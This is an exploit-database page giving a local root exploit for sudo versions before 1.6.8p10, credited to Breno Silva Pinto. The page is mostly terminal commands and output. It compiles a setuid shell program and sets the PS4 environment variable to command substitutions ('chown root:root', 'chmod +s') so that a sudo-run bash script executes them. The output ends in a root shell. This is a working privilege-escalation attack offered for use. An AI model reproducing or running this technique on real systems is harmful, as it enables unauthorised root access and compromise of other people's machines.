[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Sudo <= 1.6.8p9 (SHELLOPTS/PS4 ENV variables) Local Root Exploit

Author
Breno Silva Pinto
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-7496
Category
local exploits
Date add
09-11-2005
Platform
linux
================================================================
Sudo <= 1.6.8p9 (SHELLOPTS/PS4 ENV variables) Local Root Exploit
================================================================

## Sudo local root escalation privilege ##
## vuln versions :  sudo < 1.6.8p10
## by breno

## You need sudo access execution for some bash script ##
## Use csh shell to change SHELLOPTS env ##

ie:
       %cat x.sh
       #!/bin/bash -x

       echo "Getting root!!"
       %
##

##
       # cat /etc/sudoers
       ...
       breno   ALL=(ALL) /home/breno/x.sh
       ..
       #

## Let's use an egg shell :)
       %cat egg.c

#include <stdio.h>

       int main()
       {
       setuid(0);
       system("/bin/sh");
}
%

% gcc -o egg egg.c
% setenv SHELLOPTS xtrace
% setenv PS4 '$(chown root:root egg)'
% sudo ./x.sh
echo Getting root!!
Getting root!!
% ls -lisa egg
1198941 8 -rwxr-xr-x  1 root root 7428 2005-11-09 13:54 egg
% setenv PS4 '$(chmod +s egg)'
% sudo ./x.sh
echo Getting root!!
Getting root!!
% ./egg
sh-3.00# id
uid=0(root) gid=1000(breno) egid=0(root) grupos=7(lp),102(lpadmin),1000(breno)
sh-3.00#



#  0day.today [2024-12-24]  #